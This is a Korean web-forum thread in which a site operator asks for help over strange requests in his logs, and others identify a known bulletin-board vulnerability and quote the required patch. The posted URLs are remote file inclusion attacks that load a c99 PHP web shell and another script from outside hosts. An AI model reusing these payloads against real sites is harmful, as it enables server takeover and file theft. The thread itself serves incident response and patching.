도와주십시오. 정보
도와주십시오.본문
제 상황을 어떻게 설명해야 할지 모르겠습니다만, 아래의 주소로 제 홈페이지 http://www.corpus.co.kr에 접속하는데 정상적인 것입니까? 무엇을 어떻게 질문을 해야할지 모르겠습니다. 도와주십시오.
http://www.corpus.co.kr//bbs/write_update.php?board_skin_path=http://ammati.ru//netcat_files/free.txt?%E2%80%8F
http://www.corpus.co.kr//bbs/write_update.php?board_skin_path=http://ammati.ru//netcat_files/free.txt?%E2%80%8F
댓글 전체
감사합니다. 방금전에는 아래의 주소로 접근해 왔습니다.
http://www.corpus.co.kr//bbs//write_update.php?board_skin_path=http://baseirc.net/stoner/c99.txt?????
http://www.corpus.co.kr//bbs//write_update.php?board_skin_path=http://baseirc.net/stoner/c99.txt?????
이거 대박인대요
파일의 권한까지 수정 가능한 것인지는 모르겠는대
올라가 있는 파일들 다운이 가능하고...
제가 운영하는 홈페이지 url로 바꿔서 해보니 파일 정보가 다 보이네요 ㅡㅡ;
많은 것을 알지 못하지만 언뜻 보기에도 보안상 문제가 심각할 것 같아 보이는데
이거 sir 영자님이 보셔야 할 것 같은대요..
파일의 권한까지 수정 가능한 것인지는 모르겠는대
올라가 있는 파일들 다운이 가능하고...
제가 운영하는 홈페이지 url로 바꿔서 해보니 파일 정보가 다 보이네요 ㅡㅡ;
많은 것을 알지 못하지만 언뜻 보기에도 보안상 문제가 심각할 것 같아 보이는데
이거 sir 영자님이 보셔야 할 것 같은대요..
히로시입니다.
허접제국님 관심 보여주셔서 감사합니다.
파일 권한은 저도 이상해서 제가 바꾸어 보았습니다. nihon -> root
허접제국님 관심 보여주셔서 감사합니다.
파일 권한은 저도 이상해서 제가 바꾸어 보았습니다. nihon -> root
많은 분들이 보셔야 할 것 같아서 자유게시판에 글을 남겼습니다.
히로시님의 동의를 받지 않고 남겨서 죄송해요.
큰 문제가 아니라면 다행인데....
시스템에 문제가 없다하더라도 굉장히 기분이 나쁠것 같네요.
히로시님의 동의를 받지 않고 남겨서 죄송해요.
큰 문제가 아니라면 다행인데....
시스템에 문제가 없다하더라도 굉장히 기분이 나쁠것 같네요.
뭐죵? 해킹?
곰순이푸님 관심 감사합니다.
히로시입니다.
저는 서버를 그누보드로 두대의 서버를 운영중이었습니다. 몇주전 두대의 서버가 멈추는 일이 있었습니다.
이후 http://www.nihon.co.kr는 정상적인 운영이 안되다가 그제 리눅스가 멈춰버렸습니다.
예비로 쓰고 있던 http://www.corpus.co.kr를 가동중인데 어제 http://www.nihon.co.kr를 http://www.corpus.co.kr으로 연결해 놓았습니다. 오늘 와보니 http://www.corpus.co.kr도 연결되지 않았습니다.
현재는 메일서버를 정지시켜 놓은 상태입니다.
히로시입니다.
저는 서버를 그누보드로 두대의 서버를 운영중이었습니다. 몇주전 두대의 서버가 멈추는 일이 있었습니다.
이후 http://www.nihon.co.kr는 정상적인 운영이 안되다가 그제 리눅스가 멈춰버렸습니다.
예비로 쓰고 있던 http://www.corpus.co.kr를 가동중인데 어제 http://www.nihon.co.kr를 http://www.corpus.co.kr으로 연결해 놓았습니다. 오늘 와보니 http://www.corpus.co.kr도 연결되지 않았습니다.
현재는 메일서버를 정지시켜 놓은 상태입니다.
혹시 패치 하셨는지요?
4.22.04 (08.06.11)
: [필수패치] 웜 취약점 수정 ★★★★★★★★★★
common.php 를 아래와 같이 반드시 반드시 반드시 수정하시기 바랍니다.
// 스킨경로
$board_skin_path = ''; // <!-- 이 코드 한줄이 반드시 들어가야 합니다.
if (isset($board['bo_skin']))
$board_skin_path = "{$g4['path']}/skin/board/{$board['bo_skin']}"; // 게시판 스킨 경로
4.22.04 (08.06.11)
: [필수패치] 웜 취약점 수정 ★★★★★★★★★★
common.php 를 아래와 같이 반드시 반드시 반드시 수정하시기 바랍니다.
// 스킨경로
$board_skin_path = ''; // <!-- 이 코드 한줄이 반드시 들어가야 합니다.
if (isset($board['bo_skin']))
$board_skin_path = "{$g4['path']}/skin/board/{$board['bo_skin']}"; // 게시판 스킨 경로
관리자님 말씀대로 필수패치가 안되있네용
패치된 사이트에서는 문제가 없네요
허미...힘드셔서 글을 올리셨겠지만 원채 보기힘든 광경이라 캡쳐까지 떠서 보고 있습니다!
감사합니다.
금방 수정했습니다.
관심 보여주신 모든분에게 감사드립니다
그런데 수정하고 어떻게 해야하는지요?
컴퓨터를 다시 기동하면 되는 것입니까?
히로시
금방 수정했습니다.
관심 보여주신 모든분에게 감사드립니다
그런데 수정하고 어떻게 해야하는지요?
컴퓨터를 다시 기동하면 되는 것입니까?
히로시
패치의 중요성을 다시 되새기게 해주는 글이군요.
패치를 안 해도 웹호스팅업체에서 자체적으로 막아주기도 하네요. 확인 차 몇 군데 확인하니 오래 전에 만들어 준 사이트가 있는데 거긴 관리를 안 한 지 4년이 되었으나(관리자 자체를 안 둠) 웹호스팅 업체에서 외부 공격을 막아주고 있네요. 아마 저렴한 업체들은 이런 서비스가 없을 듯 합니다.
그 웹호스팅업체 명? 이궁금해요.^^ 서비스 괜찮은 업체 찾는 데 도움 좀 받읍시다.
아사달과 x-y.net 인데 두 곳은 괜찮은 듯 하네요. 전 원래 저가형 웹호스팅은 추천하지 않습니다. 두 곳 가운데 어느 곳을 선택할 것이냐고 한다면 전 후자입니다. 후자의 대응이 훨씬 순조롭습니다. 몇 푼 안 되는 돈으로 옥신각신하는 것 자체를 싫어하기에 저가형은 애초부터 배제하는 스타일입니다. 후자는 해외 도메인도 일정 수준(가격 기준인데 개인적으로 고급만 신청해서 그런지 대응이 아주 빠르네요.) 이상이면 막아주어서 어지간한 공격은 다 피할 수 있습니다.
몇 개 사이트 운영도 하고 제작 관리도 해주면서 보니 큰 무리가 없어 보입니다.
몇 개 사이트 운영도 하고 제작 관리도 해주면서 보니 큰 무리가 없어 보입니다.
컥 아직 패치안돼신듯;;;
올려주신 링크 c99 접근되네요
올려주신 링크 c99 접근되네요
히로시입니다.
한다고 했는데...다시 한번 확인해주시지 않겠습니까?
한다고 했는데...다시 한번 확인해주시지 않겠습니까?
정상적으로 막혔습니다.
무슨 경로지..